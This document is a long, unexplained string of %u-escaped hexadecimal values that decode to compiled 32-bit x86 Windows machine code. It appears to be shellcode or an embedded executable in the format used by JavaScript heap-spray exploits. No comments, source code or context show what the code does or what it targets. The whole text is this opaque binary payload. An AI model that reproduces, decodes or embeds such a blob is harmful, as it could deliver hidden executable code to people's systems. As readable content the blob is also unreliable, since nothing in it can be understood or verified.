7874%u35ff%ub7e4%u0040%u26e8%ufff8%u59ff%uf08b%u7589%u89dc%ue47d%u7589%u83e0%u04ee%u7589%u3bdc%u72f7%ue857%uf802%uffff%u0639%ued74%uf73b%u4a72%u36ff%ufce8%ufff7%u8bff%ue8f8%uf7ec%uffff%u0689%ud7ff%u35ff%ub7e8%u0040%ue6e8%ufff7%u8bff%ufff8%ue435%u40b7%ue800%uf7d9%uffff%uc483%u390c%ue47d%u0575%u4539%u74e0%u890e%ue47d%u7d89%u89d8%ue045%uf08b%u7589%u8bdc%ud87d%u9feb%u7068%u4081%ub800%u816c%u0040%u5fe8%ufffe%u59ff%u7868%u4081%ub800%u8174%u0040%u4fe8%ufffe%u59ff%u45c7%ufefc%uffff%ue8ff%u001f%u0000%u7d83%u0010%u2875%u1d89%uacf0%u0040%u086a%ufbe8%u0014%u5900%u75ff%ue808%ufdfc%uffff%udb33%u8343%u107d%u7400%u6a08%ue808%u14e2%u0000%uc359%u5ee8%u000b%uc300%uff8b%u8b55%u6aec%u6a00%uff00%u0875%uc3e8%ufffe%u83ff%u0cc4%uc35d%uff8b%u8b55%u6aec%u6a00%uff01%u0875%uade8%ufffe%u83ff%u0cc4%uc35d%u016a%u006a%u006a%u9de8%ufffe%u83ff%u0cc4%u6ac3%u6a01%u6a01%ue800%ufe8e%uffff%uc483%uc30c%uff8b%ue856%uf6fe%uffff%uf08b%ue856%u23fa%u0000%ue856%u2385%u0000%ue856%ue9eb%uffff%ue856%u236a%u0000%ue856%u2355%u0000%ue856%u213d%u0000%ue856%u01fe%u0000%ue856%u1e6d%u0000%u2e68%u4036%ue800%uf650%uffff%uc483%ua324%ua7a0%u0040%uc35e%uff8b%u8b55%u51ec%u5351%u5d8b%u5608%u3357%u33f6%u89ff%ufc7d%u1c3b%ua8fd%u40a7%u7400%u4709%u7d89%u83fc%u17ff%uee72%uff83%u0f17%u7783%u0001%u6a00%ue803%u2526%u0000%u8359%u01f8%u840f%u0134%u0000%u036a%u15e8%u0025%u5900%uc085%u0d75%u3d83%ua000%u0040%u0f01%u1b84%u0001%u8100%ufcfb%u0000%u0f00%u4184%u0001%u6800%u8838%u0040%u14bb%u0003%u5300%uf8bf%u40ac%u5700%ufbe8%u0018%u8300%u0cc4%uc085%u0d74%u5656%u5656%ue856%ue93c%uffff%uc483%u6814%u0104%u0000%u11be%u40ad%u5600%u006a%u05c6%uae15%u0040%uff00%u2415%u4080%u8500%u75c0%u6826%u8820%u0040%ufb68%u0002%u5600%ub9e8%u0018%u8300%u0cc4%uc085%u0f74%uc033%u5050%u5050%ue850%ue8f8%uffff%uc483%u5614%u77e8%u001c%u4000%u8359%u3cf8%u3876%ue856%u1c6a%u0000%uee83%u033b%u6ac6%ub903%ub00c%u0040%u1c68%u4088%u2b00%u51c8%ue850%ue4ba%uffff%uc483%u8514%u74c0%u3311%u56f6%u5656%u5656%ub5e8%uffe8%u83ff%u14c4%u02eb%uf633%u1868%u4088%u5300%ue857%ue420%uffff%uc483%u850c%u74c0%u560d%u5656%u5656%u91e8%uffe8%u83ff%u14c4%u458b%ufffc%uc534%ua7ac%u0040%u5753%ufbe8%uffe3%u83ff%u0cc4%uc085%u0d74%u5656%u5656%ue856%ue86c%uffff%uc483%u6814%u2010%u0001%uf068%u4087%u5700%u84e8%u0022%u8300%u0cc4%u32eb%uf46a%u15ff%u80b4%u0040%ud88b%ude3b%u2474%ufb83%u74ff%u6a1f%u8d00%uf845%u8d50%ufd34%ua7ac%u0040%u36ff%ub5e8%u001b%u5900%uff50%u5336%u15ff%u80b0%u0040%u5e5f%uc95b%u6ac3%ue803%u23aa%u0000%u8359%u01f8%u1574%u036a%u9de8%u0023%u5900%uc085%u1f75%u3d83%ua000%u0040%u7501%u6816%u00fc%u0000%u29e8%ufffe%u68ff%u00ff%u0000%u1fe8%ufffe%u59ff%uc359%u8bc3%u55ff%uec8b%u5151%ue856%uf6a2%uffff%uf08b%uf685%u840f%u0146%u0000%u568b%ua15c%ua86c%u0040%u8b57%u087d%uca8b%u3953%u7439%u8b0e%u6bd8%u0cdb%uc183%u030c%u3bda%u72cb%u6bee%u0cc0%uc203%uc83b%u0873%u3939%u0475%uc18b%u02eb%uc033%uc085%u0a74%u588b%u8908%ufc5d%udb85%u0775%uc033%ufbe9%u0000%u8300%u05fb%u0c75%u6083%u0008%uc033%ue940%u00ea%u0000%ufb83%u0f01%ude84%u0000%u8b00%u604e%u4d89%u8bf8%u0c4d%u4e89%u8b60%u0448%uf983%u0f08%ub885%u0000%u8b00%u600d%u40a8%u8b00%u643d%u40a8%u8b00%u03d1%u3bf9%u7dd7%u6b24%u0cc9%u7e8b%u835c%u3964%u0008%u3d8b%ua860%u0040%u1d8b%ua864%u0040%u0342%u83df%u0cc1%ud33b%ue27c%u5d8b%u8bfc%u8b00%u647e%u8e3d%u0000%u75c0%uc709%u6446%u0083%u0000%u5eeb%u903d%u0000%u75c0%uc709%u6446%u0081%u0000%u4eeb%u913d%u0000%u75c0%uc709%u6446%u0084%u0000%u3eeb%u933d%u0000%u75c0%uc709%u6446%u0085%u0000%u2eeb%u8d3d%u0000%u75c0%uc709%u6446%u0082%u0000%u1eeb%u8f3d%u0000%u75c0%uc709%u6446%u0086%u0000%u0eeb%u923d%u0000%u75c0%uc707%u6446%u008a%u0000%u76ff%u6a64%uff08%u59d3%u7e89%ueb64%u8307%u0860%u5100%ud3ff%u458b%u59f8%u4689%u8360%uffc8%u5f5b%uc95e%u83c3%uec3d%u40b7%u0000%u0575%ub0e8%uffef%u56ff%u358b%uac60%u0040%u3357%u85ff%u75f6%u8318%uffc8%ua0e9%u0000%u3c00%u743d%u4701%ue856%u19dc%u0000%u8d59%u0674%u8a01%u8406%u75c0%u6aea%u4704%ue857%u129a%u0000%uf88b%u5959%u3d89%uacd0%u0040%uff85%ucb74%u358b%uac60%u0040%ueb53%u5642%uabe8%u0019%u8b00%u43d8%u3e80%u593d%u3174%u016a%ue853%u126c%u0000%u5959%u0789%uc085%u4e74%u5356%ue850%u15b0%u0000%uc483%u850c%u74c0%u330f%u50c0%u5050%u5050%uefe8%uffe5%u83ff%u14c4%uc783%u0304%u80f3%u003e%ub975%u35ff%uac60%u0040%u5ee8%u0011%u8300%u6025%u40ac%u0000%u2783%uc700%ue005%u40b7%u0100%u0000%u3300%u59c0%u5f5b%uc35e%u35ff%uacd0%u0040%u38e8%u0011%u8300%ud025%u40ac%u0000%uc883%uebff%u8be4%u55ff%uec8b%u8b51%u104d%u3353%u56c0%u0789%uf28b%u558b%uc70c%u0101%u0000%u3900%u0845%u0974%u5d8b%u8308%u0845%u8904%u8913%ufc45%u3e80%u7522%u3310%u39c0%ufc45%u22b3%u940f%u46c0%u4589%uebfc%uff3c%u8507%u74d2%u8a08%u8806%u4202%u5589%u8a0c%u0f1e%uc3b6%u4650%u7de8%u0021%u5900%uc085%u1374%u07ff%u7d83%u000c%u0a74%u4d8b%u8a0c%uff06%u0c45%u0188%u8b46%u0c55%u4d8b%u8410%u74db%u8332%ufc7d%u7500%u80a9%u20fb%u0574%ufb80%u7509%u859f%u74d2%uc604%uff42%u8300%ufc65%u8000%u003e%u840f%u00e9%u0000%u068a%u203c%u0474%u093c%u0675%ueb46%u4ef3%ue3eb%u3e80%u0f00%ud084%u0000%u8300%u087d%u7400%u8b09%u0845%u4583%u0408%u1089%u01ff%udb33%u3343%uebc9%u4602%u8041%u5c3e%uf974%u3e80%u7522%uf626%u01c1%u1f75%u7d83%u00fc%u0c74%u468d%u8001%u2238%u0475%uf08b%u0deb%uc033%udb33%u4539%u0ffc%uc094%u4589%ud1fc%u85e9%u74c9%u4912%ud285%u0474%u02c6%u425c%u07ff%uc985%uf175%u5589%u8a0c%u8406%u74c0%u8355%ufc7d%u7500%u3c08%u7420%u3c4b%u7409%u8547%u74db%u0f3d%uc0be%u8550%u74d2%ue823%u2098%u0000%u8559%u74c0%u8a0d%u8b06%u0c4d%u45ff%u880c%u4601%u07ff%u4d8b%u8a0c%uff06%u0c45%u0188%u0deb%u75e8%u0020%u5900%uc085%u0374%uff46%uff07%u8b07%u0c55%ue946%uff56%uffff%ud285%u0774%u02c6%u4200%u5589%uff0c%u8b07%u104d%u0ee9%uffff%u8bff%u0845%u5b5e%uc085%u0374%u2083%uff00%uc901%u8bc3%u55ff%uec8b%uec83%u530c%udb33%u5756%u1d39%ub7ec%u0040%u0575%u2ce8%uffed%u68ff%u0104%u0000%u10be%u40b0%u5600%u8853%u141d%u40b1%uff00%u2415%u4080%ua100%ub7f8%u0040%u3589%uace0%u0040%uc33b%u0774%u4589%u38fc%u7518%u8903%ufc75%u558b%u8dfc%uf845%u5350%u8d53%uf47d%u0ae8%ufffe%u8bff%uf845%uc483%u3d0c%uffff%u3fff%u4a73%u4d8b%u83f4%ufff9%u4273%uf88b%ue7c1%u8d02%u0f04%uc13b%u3672%ue850%u0f9d%u0000%uf08b%u3b59%u74f3%u8b29%ufc55%u458d%u50f8%ufe03%u5657%u7d8d%ue8f4%ufdc9%uffff%u458b%u83f8%u0cc4%ua348%uacc4%u0040%u3589%uacc8%u0040%uc033%u03eb%uc883%u5fff%u5b5e%uc3c9%uff8b%u8b55%ua1ec%ub118%u0040%uec83%u530c%u8b56%uc835%u4080%u5700%udb33%uff33%uc33b%u2e75%ud6ff%uf88b%ufb3b%u0c74%u05c7%ub118%u0040%u0001%u0000%u23eb%u15ff%u8018%u0040%uf883%u7578%u6a0a%u5802%u18a3%u40b1%ueb00%ua105%ub118%u0040%uf883%u0f01%u8185%u0000%u3b00%u75fb%uff0f%u8bd6%u3bf8%u75fb%u3307%ue9c0%u00ca%u0000%uc78b%u3966%u741f%u400e%u6640%u1839%uf975%u4040%u3966%u7518%u8bf2%uc435%u4080%u5300%u5353%uc72b%ud153%u40f8%u5750%u5353%u4589%ufff4%u89d6%uf845%uc33b%u2f74%ue850%u0ec3%u0000%u8959%ufc45%uc33b%u2174%u5353%u75ff%u50f8%u75ff%u57f4%u5353%ud6ff%uc085%u0c75%u75ff%ue8fc%u0e13%u0000%u8959%ufc5d%u5d8b%u57fc%u15ff%u80c0%u0040%uc38b%u5ceb%uf883%u7402%u3b04%u75c3%uff82%ubc15%u4080%u8b00%u3bf0%u0ff3%u7284%uffff%u38ff%u741e%u400a%u1838%ufb75%u3840%u7518%u2bf6%u40c6%u8950%uf845%u5ce8%u000e%u8b00%u59f8%ufb3b%u0c75%uff56%ub815%u4080%ue900%uff45%uffff%u75ff%u56f8%ue857%u1242%u0000%uc483%u560c%u15ff%u80b8%u0040%uc78b%u5e5f%uc95b%u6ac3%u6854%u9650%u0040%uc5e8%u0002%u3300%u89ff%ufc7d%u458d%u509c%u15ff%u80d4%u0040%u45c7%ufefc%uffff%u6aff%u6a40%u5e20%ue856%u0e46%u0000%u5959%uc73b%u840f%u0214%u0000%ue0a3%u40b6%u8900%ud835%u40b6%u8d00%u0088%u0008%ueb00%uc630%u0440%u8300%uff08%u40c6%u0a05%u7889%uc608%u2440%uc600%u2540%uc60a%u2640%u890a%u3878%u40c6%u0034%uc083%u8b40%ue00d%u40b6%u8100%u00c1%u0008%u3b00%u72c1%u66cc%u7d39%u0fce%u0a84%u0001%u8b00%ud045%uc73b%u840f%u00ff%u0000%u388b%u588d%u8d04%u3b04%u4589%ubee4%u0800%u0000%ufe3b%u027c%ufe8b%u45c7%u01e0%u0000%ueb00%u6a5b%u6a40%ue820%u0db8%u0000%u5959%uc085%u5674%u4d8b%u8de0%u8d0c%ub6e0%u0040%u0189%u0583%ub6d8%u0040%u8d20%u0090%u0008%ueb00%uc62a%u0440%u8300%uff08%u40c6%u0a05%u6083%u0008%u6080%u8024%u40c6%u0a25%u40c6%u0a26%u6083%u0038%u40c6%u0034%uc083%u8b40%u0311%u3bd6%u72c2%uffd2%ue045%u3d39%ub6d8%u0040%u9d7c%u06eb%u3d8b%ub6d8%u0040%u6583%u00e0%uff85%u6d7e%u458b%u8be4%u8308%ufff9%u5674%uf983%u74fe%u8a51%ua803%u7401%ua84b%u7508%u510b%u15ff%u80d0%u0040%uc085%u3c74%u758b%u8be0%uc1c6%u05f8%ue683%uc11f%u06e6%u3403%ue085%u40b6%u8b00%ue445%u008b%u0689%u038a%u4688%u6804%u0fa0%u0000%u468d%u500c%u35e8%u001a%u5900%u8559%u0fc0%uc984%u0000%uff00%u0846%u45ff%u43e0%u4583%u04e4%u7d39%u7ce0%u3393%u8bdb%uc1f3%u06e6%u3503%ub6e0%u0040%u068b%uf883%u74ff%u830b%ufef8%u0674%u4e80%u8004%u72eb%u46c6%u8104%udb85%u0575%uf66a%ueb58%u8b0a%u48c3%ud8f7%uc01b%uc083%u50f5%u15ff%u80b4%u0040%uf88b%uff83%u74ff%u8543%u74ff%u573f%u15ff%u80d0%u0040%uc085%u3474%u3e89%uff25%u0000%u8300%u02f8%u0675%u4e80%u4004%u09eb%uf883%u7503%u8004%u044e%u6808%u0fa0%u0000%u468d%u500c%u9fe8%u0019%u5900%u8559%u74c0%uff37%u0846%u0aeb%u4e80%u4004%u06c7%ufffe%uffff%u8343%u03fb%u8c0f%uff67%uffff%u35ff%ub6d8%u0040%u15ff%u80cc%u0040%uc033%u11eb%uc033%uc340%u658b%uc7e8%ufc45%ufffe%uffff%uc883%ue8ff%u00c3%u0000%u8bc3%u56ff%u50b8%u4095%ube00%u9550%u0040%u8b57%u3bf8%u73c6%u8b0f%u8507%u74c0%uff02%u83d0%u04c7%ufe3b%uf172%u5e5f%u8bc3%u56ff%u58b8%u4095%ube00%u9558%u0040%u8b57%u3bf8%u73c6%u8b0f%u8507%u74c0%uff02%u83d0%u04c7%ufe3b%uf172%u5e5f%u8bc3%u55ff%uec8b%uc033%u4539%u6a08%u0f00%uc094%u0068%u0010%u5000%u15ff%u80dc%u0040%u1ca3%u40b1%u8500%u75c0%u5d02%u33c3%u40c0%ud4a3%u40b6%u5d00%uccc3%u9068%u4041%u6400%u35ff%u0000%u0000%u448b%u1024%u6c89%u1024%u6c8d%u1024%ue02b%u5653%ua157%ua8b4%u0040%u4531%u33fc%u50c5%u6589%uffe8%uf875%u458b%uc7fc%ufc45%ufffe%uffff%u4589%u8df8%uf045%ua364%u0000%u0000%u8bc3%uf04d%u8964%u000d%u0000%u5900%u5f5f%u5b5e%ue58b%u515d%uccc3%ucccc%ucccc%ucccc%uff8b%u8b55%u83ec%u18ec%u8b53%u0c5d%u8b56%u0873%u3533%ua8b4%u0040%u8b57%uc606%uff45%uc700%uf445%u0001%u0000%u7b8d%u8310%ufef8%u0d74%u4e8b%u0304%u33cf%u380c%uf1e8%u0001%u8b00%u0c4e%u468b%u0308%u33cf%u380c%ue1e8%u0001%u8b00%u0845%u40f6%u6604%u850f%u0116%u0000%u4d8b%u8d10%ue855%u5389%u8bfc%u0c5b%u4589%u89e8%uec4d%ufb83%u74fe%u8d5f%u0049%u048d%u8b5b%u864c%u8d14%u8644%u8910%uf045%u008b%u4589%u85f8%u74c9%u8b14%ue8d7%u265c%u0000%u45c6%u01ff%uc085%u407c%u477f%u458b%u8bf8%u83d8%ufef8%uce75%u7d80%u00ff%u2474%u068b%uf883%u74fe%u8b0d%u044e%ucf03%u0c33%ue838%u016e%u0000%u4e8b%u8b0c%u0856%ucf03%u0c33%ue83a%u015e%u0000%u458b%u5ff4%u5b5e%ue58b%uc35d%u45c7%u00f4%u0000%ueb00%u8bc9%u084d%u3981%u7363%ue06d%u2975%u3d83%ub6d0%u0040%u7400%u6820%ub6d0%u0040%u83e8%u0014%u8300%u04c4%uc085%u0f74%u558b%u6a08%u5201%u15ff%ub6d0%u0040%uc483%u8b08%u0c4d%uffe8%u0025%u8b00%u0c45%u5839%u740c%u6812%ua8b4%u0040%u8b57%u8bd3%ue8c8%u2602%u0000%u458b%u8b0c%uf84d%u4889%u8b0c%u8306%ufef8%u0d74%u4e8b%u0304%u33cf%u380c%udbe8%u0000%u8b00%u0c4e%u568b%u0308%u33cf%u3a0c%ucbe8%u0000%u8b00%uf045%u488b%u8b08%ue8d7%u2595%u0000%ufeba%uffff%u39ff%u0c53%u840f%uff52%uffff%ub468%u40a8%u5700%ucb8b%uade8%u0025%ue900%uff1c%uffff%uff8b%u8b55%u83ec%u10ec%ub4a1%u40a8%u8300%uf865%u8300%ufc65%u5300%ubf57%ue64e%ubb40%u00bb%uff00%u3bff%u74c7%u850d%u74c3%uf709%ua3d0%ua8b8%u0040%u60eb%u8d56%uf845%uff50%uf415%u4080%u8b00%ufc75%u7533%ufff8%uf015%u4080%u3300%ufff0%uac15%u4080%u3300%ufff0%uec15%u4080%u3300%u8df0%uf045%uff50%ue815%u4080%u8b00%uf445%u4533%u33f0%u3bf0%u75f7%ube07%ue64f%ubb40%u0beb%uf385%u0775%uc68b%ue0c1%u0b10%u89f0%ub435%u40a8%uf700%u89d6%ub835%u40a8%u5e00%u5b5f%uc3c9%u2583%ub6cc%u0040%uc300%u0d3b%ua8b4%u0040%u0275%uc3f3%u12e9%u0025%ucc00%ucccc%ucccc%ucccc%u548b%u0c24%u4c8b%u0424%ud285%u6974%uc033%u448a%u0824%uc084%u1675%ufa81%u0100%u0000%u0e72%u3d83%ub6b0%u0040%u7400%ue905%u263c%u0000%u8b57%u83f9%u04fa%u3172%ud9f7%ue183%u7403%u2b0c%u88d1%u8307%u01c7%ue983%u7501%u8bf6%uc1c8%u08e0%uc103%uc88b%ue0c1%u0310%u8bc1%u83ca%u03e2%ue9c1%u7402%uf306%u85ab%u74d2%u880a%u8307%u01c7%uea83%u7501%u8bf6%u2444%u5f08%u8bc3%u2444%uc304%uff8b%u8b55%u8bec%u0845%uc085%u1274%ue883%u8108%udd38%u00dd%u7500%u5007%u98e8%u0007%u5900%uc35d%uff8b%u8b55%u83ec%u14ec%ub4a1%u40a8%u3300%u89c5%ufc45%u5653%udb33%u8b57%u39f1%u201d%u40b1%u7500%u5338%u3353%u47ff%u6857%u88d0%u0040%u0068%u0001%u5300%u15ff%u8100%u0040%uc085%u0874%u3d89%ub120%u0040%u15eb%u15ff%u8018%u0040%uf883%u7578%uc70a%u2005%u40b1%u0200%u0000%u3900%u145d%u227e%u4d8b%u8b14%u1045%u3849%u7418%u4008%ucb3b%uf675%uc983%u8bff%u1445%uc12b%u3b48%u1445%u017d%u8940%u1445%u20a1%u40b1%u8300%u02f8%u840f%u01ac%u0000%uc33b%u840f%u01a4%u0000%uf883%u0f01%ucc85%u0001%u8900%uf85d%u5d39%u7520%u8b08%u8b06%u0440%u4589%u8b20%ufc35%u4080%u3300%u39c0%u245d%u5353%u75ff%u0f14%uc095%u75ff%u8d10%uc504%u0001%u0000%uff50%u2075%ud6ff%uf88b%ufb3b%u840f%u018f%u0000%u437e%ue06a%ud233%uf758%u83f7%u02f8%u3772%u448d%u083f%u003d%u0004%u7700%ue813%u293c%u0000%uc48b%uc33b%u1c74%u00c7%ucccc%u0000%u11eb%ue850%u285a%u0000%u3b59%u74c3%uc709%udd00%u00dd%u8300%u08c0%u4589%uebf4%u8903%uf45d%u5d39%u0ff4%u3e84%u0001%u5700%u75ff%ufff4%u1475%u75ff%u6a10%uff01%u2075%ud6ff%uc085%u840f%u00e3%u0000%u358b%u8100%u0040%u5353%uff57%uf475%u75ff%uff0c%u0875%ud6ff%uc88b%u4d89%u3bf8%u0fcb%uc284%u0000%uf700%u0c45%u0400%u0000%u2974%u5d39%u0f1c%ub084%u0000%u3b00%u1c4d%u8f0f%u00a7%u0000%u75ff%uff1c%u1875%uff57%uf475%u75ff%uff0c%u0875%ud6ff%u90e9%u0000%u3b00%u7ecb%u6a45%u33e0%u58d2%uf1f7%uf883%u7202%u8d39%u0944%u3d08%u0400%u0000%u1677%u7de8%u0028%u8b00%u3bf4%u74f3%uc76a%ucc06%u00cc%u8300%u08c6%u1aeb%ue850%u2798%u0000%u3b59%u74c3%uc709%udd00%u00dd%u8300%u08c0%uf08b%u02eb%uf633%uf33b%u4174%u75ff%u56f8%uff57%uf475%u75ff%uff0c%u0875%u15ff%u8100%u0040%uc085%u2274%u5353%u5d39%u751c%u5304%ueb53%uff06%u1c75%u75ff%uff18%uf875%u5356%u75ff%uff20%uc415%u4080%u8900%uf845%ue856%ufdb8%uffff%uff59%uf475%uafe8%ufffd%u8bff%uf845%ue959%u0159%u0000%u5d89%u89f4%uf05d%u5d39%u7508%u8b08%u8b06%u1440%u4589%u3908%u205d%u0875%u068b%u408b%u8904%u2045%u75ff%ue808%u24ba%u0000%u8959%uec45%uf883%u75ff%u3307%ue9c0%u0121%u0000%u453b%u0f20%udb84%u0000%u5300%u8d53%u144d%uff51%u1075%uff50%u2075%ud8e8%u0024%u8300%u18c4%u4589%u3bf4%u74c3%u8bd4%uf835%u4080%u5300%uff53%u1475%uff50%u0c75%u75ff%uff08%u89d6%uf845%uc33b%u0775%uf633%ub7e9%u0000%u7e00%u833d%ue0f8%u3877%uc083%u3d08%u0400%u0000%u1677%u67e8%u0027%u8b00%u3bfc%u74fb%uc7dd%ucc07%u00cc%u8300%u08c7%u1aeb%ue850%u2682%u0000%u3b59%u74c3%uc709%udd00%u00dd%u8300%u08c0%uf88b%u02eb%uff33%ufb3b%ub474%u75ff%u53f8%ue857%ufc5e%uffff%uc483%uff0c%uf875%uff57%u1475%u75ff%ufff4%u0c75%u75ff%uff08%u89d6%uf845%uc33b%u0475%uf633%u25eb%u75ff%u8d1c%uf845%u75ff%u5018%uff57%u2075%u75ff%ue8ec%u2427%u0000%uf08b%u7589%u83f0%u18c4%udef7%uf61b%u7523%u57f8%u8de8%ufffc%u59ff%u1aeb%u75ff%uff1c%u1875%u75ff%uff14%u1075%u75ff%uff0c%u0875%u15ff%u80f8%u0040%uf08b%u5d39%u74f4%uff09%uf475%u18e8%u0004%u5900%u458b%u3bf0%u74c3%u390c%u1845%u0774%ue850%u0405%u0000%u8b59%u8dc6%ue065%u5e5f%u8b5b%ufc4d%ucd33%uade8%ufffb%uc9ff%u8bc3%u55ff%uec8b%uec83%uff10%u0875%u4d8d%ue8f0%ud4fd%uffff%u75ff%u8d28%uf04d%u75ff%uff24%u2075%u75ff%uff1c%u1875%u75ff%uff14%u1075%u75ff%ue80c%ufc28%uffff%uc483%u8020%ufc7d%u7400%u8b07%uf84d%u6183%ufd70%uc3c9%uff8b%u8b55%u51ec%ua151%ua8b4%u0040%uc533%u4589%ua1fc%ub124%u0040%u5653%udb33%u8b57%u3bf9%u75c3%u8d3a%uf845%u3350%u46f6%u6856%u88d0%u0040%uff56%u0815%u4081%u8500%u74c0%u8908%u2435%u40b1%ueb00%uff34%u1815%u4080%u8300%u78f8%u0a75%u026a%ua358%ub124%u0040%u05eb%u24a1%u40b1%u8300%u02f8%u840f%u00cf%u0000%uc33b%u840f%u00c7%u0000%uf883%u0f01%ue885%u0000%u8900%uf85d%u5d39%u7518%u8b08%u8b07%u0440%u4589%u8b18%ufc35%u4080%u3300%u39c0%u205d%u5353%u75ff%u0f10%uc095%u75ff%u8d0c%uc504%u0001%u0000%uff50%u1875%ud6ff%uf88b%ufb3b%u840f%u00ab%u0000%u3c7e%uff81%ufff0%u7fff%u3477%u448d%u083f%u003d%u0004%u7700%ue813%u2580%u0000%uc48b%uc33b%u1c74%u00c7%ucccc%u0000%u11eb%ue850%u249e%u0000%u3b59%u74c3%uc709%udd00%u00dd%u8300%u08c0%ud88b%udb85%u6974%u048d%u503f%u006a%ue853%ufa7c%uffff%uc483%u570c%uff53%u1075%u75ff%u6a0c%uff01%u1875%ud6ff%uc085%u1174%u75ff%u5014%uff53%u0875%u15ff%u8108%u0040%u4589%u53f8%uc9e8%ufffa%u8bff%uf845%ueb59%u3375%u39f6%u1c5d%u0875%u078b%u408b%u8914%u1c45%u5d39%u7518%u8b08%u8b07%u0440%u4589%uff18%u1c75%udbe8%u0021%u5900%uf883%u75ff%u3304%uebc0%u3b47%u1845%u1e74%u5353%u4d8d%u5110%u75ff%u500c%u75ff%ue818%u2203%u0000%uf08b%uc483%u3b18%u74f3%u89dc%u0c75%u75ff%uff14%u1075%u75ff%uff0c%u0875%u75ff%uff1c%u0415%u4081%u8b00%u3bf8%u74f3%u5607%u06e8%u0002%u5900%uc78b%u658d%u5fec%u5b5e%u4d8b%u33fc%ue8cd%uf9ae%uffff%uc3c9%uff8b%u8b55%u83ec%u10ec%u75ff%u8d08%uf04d%ufee8%uffd2%uffff%u2475%u4d8d%ufff0%u2075%u75ff%uff1c%u1875%u75ff%uff14%u1075%u75ff%ue80c%ufe16%uffff%uc483%u801c%ufc7d%u7400%u8b07%uf84d%u6183%ufd70%uc3c9%uff8b%u5756%uf633%u28bf%u40b1%u8300%uf53c%ua8c4%u0040%u7501%u8d1e%uf504%ua8c0%u0040%u3889%ua068%u000f%uff00%u8330%u18c7%u8fe8%u000f%u5900%u8559%u74c0%u460c%ufe83%u7c24%u33d2%u40c0%u5e5f%u83c3%uf524%ua8c0%u0040%u3300%uebc0%u8bf1%u53ff%u1d8b%u80d8%u0040%ube56%ua8c0%u0040%u8b57%u853e%u74ff%u8313%u047e%u7401%u570d%ud3ff%ue857%u013f%u0000%u2683%u5900%uc683%u8108%ue0fe%u40a9%u7c00%ubedc%ua8c0%u0040%u8b5f%u8506%u74c0%u8309%u047e%u7501%u5003%ud3ff%uc683%u8108%ue0fe%u40a9%u7c00%u5ee6%uc35b%uff8b%u8b55%u8bec%u0845%u34ff%uc0c5%u40a8%uff00%u0c15%u4081%u5d00%u6ac3%u680c%u9670%u0040%u1be8%ufff6%u33ff%u47ff%u7d89%u33e4%u39db%u1c1d%u40b1%u7500%ue818%ued31%uffff%u1e6a%u7fe8%uffeb%u68ff%u00ff%u0000%uc1e8%uffe8%u59ff%u8b59%u0875%u348d%uc0f5%u40a8%u3900%u741e%u8b04%uebc7%u6a6e%ue818%u0137%u0000%u8b59%u3bf8%u75fb%ue80f%ud6a6%uffff%u00c7%u000c%u0000%uc033%u51eb%u0a6a%u59e8%u0000%u5900%u5d89%u39fc%u751e%u682c%u0fa0%u0000%ue857%u0e86%u0000%u5959%uc085%u1775%ue857%u006d%u0000%ue859%ud670%uffff%u00c7%u000c%u0000%u5d89%uebe4%u890b%ueb3e%u5707%u52e8%u0000%u5900%u45c7%ufefc%uffff%ue8ff%u0009%u0000%u458b%ue8e4%uf5b3%uffff%u6ac3%ue80a%uff28%uffff%uc359%uff8b%u8b55%u8bec%u0845%u8d56%uc534%ua8c0%u0040%u3e83%u7500%u5013%u22e8%uffff%u59ff%uc085%u0875%u116a%ub5e8%uffe7%u59ff%u36ff%u15ff%u8110%u0040%u5d5e%u6ac3%u680c%u9690%u0040%u25e8%ufff5%u8bff%u0875%uf685%u7574%u3d83%ub6d4%u0040%u7503%u6a43%ue804%uffaa%uffff%u8359%ufc65%u5600%u95e8%u0010%u5900%u4589%u85e4%u74c0%u5609%ue850%u10b6%u0000%u5959%u45c7%ufefc%uffff%ue8ff%u000b%u0000%u7d83%u00e4%u3775%u75ff%ueb08%u6a0a%ue804%ufe96%uffff%uc359%u6a56%uff00%u1c35%u40b1%uff00%ue415%u4080%u8500%u75c0%ue816%ud592%uffff%uf08b%u15ff%u8018%u0040%ue850%ud542%uffff%u0689%ue859%uf4e9%uffff%u8bc3%u55ff%uec8b%u5756%uf633%u75ff%ue808%u2134%u0000%uf88b%u8559%u75ff%u3927%u7805%u40b2%u7600%u561f%u15ff%u803c%u0040%u868d%u03e8%u0000%u053b%ub278%u0040%u0376%uc883%u8bff%u83f0%ufff8%uca75%uc78b%u5e5f%uc35d%uff8b%u8b55%u56ec%u3357%u6af6%uff00%u0c75%u75ff%ue808%u21e4%u0000%uf88b%uc483%u850c%u75ff%u3927%u7805%u40b2%u7600%u561f%u15ff%u803c%u0040%u868d%u03e8%u0000%u053b%ub278%u0040%u0376%uc883%u8bff%u83f0%ufff8%uc375%uc78b%u5e5f%uc35d%uff8b%u8b55%u56ec%u3357%ufff6%u0c75%u75ff%ue808%u22b8%u0000%uf88b%u5959%uff85%u2c75%u4539%u740c%u3927%u7805%u40b2%u7600%u561f%u15ff%u803c%u0040%u868d%u03e8%u0000%u053b%ub278%u0040%u0376%uc883%u8bff%u83f0%ufff8%uc175%uc78b%u5e5f%uc35d%uff8b%u8b55%u56ec%u758b%u8508%u0ff6%u8184%u0001%uff00%u0476%u7ae8%ufffe%uffff%u0876%u72e8%ufffe%uffff%u0c76%u6ae8%ufffe%uffff%u1076%u62e8%ufffe%uffff%u1476%u5ae8%ufffe%uffff%u1876%u52e8%ufffe%uffff%ue836%ufe4b%uffff%u76ff%ue820%ufe43%uffff%u76ff%ue824%ufe3b%uffff%u76ff%ue828%ufe33%uffff%u76ff%ue82c%ufe2b%uffff%u76ff%ue830%ufe23%uffff%u76ff%ue834%ufe1b%uffff%u76ff%ue81c%ufe13%uffff%u76ff%ue838%ufe0b%uffff%u76ff%ue83c%ufe03%uffff%uc483%uff40%u4076%uf8e8%ufffd%uffff%u4476%uf0e8%ufffd%uffff%u4876%ue8e8%ufffd%uffff%u4c76%ue0e8%ufffd%uffff%u5076%ud8e8%ufffd%uffff%u5476%ud0e8%ufffd%uffff%u5876%uc8e8%ufffd%uffff%u5c76%uc0e8%ufffd%uffff%u6076%ub8e8%ufffd%uffff%u6476%ub0e8%ufffd%uffff%u6876%ua8e8%ufffd%uffff%u6c76%ua0e8%ufffd%uffff%u7076%u98e8%ufffd%uffff%u7476%u90e8%ufffd%uffff%u7876%u88e8%ufffd%uffff%u7c76%u80e8%ufffd%u83ff%u40c4%ub6ff%u0080%u0000%u72e8%ufffd%uffff%u84b6%u0000%ue800%ufd67%uffff%ub6ff%u0088%u0000%u5ce8%ufffd%uffff%u8cb6%u0000%ue800%ufd51%uffff%ub6ff%u0090%u0000%u46e8%ufffd%uffff%u94b6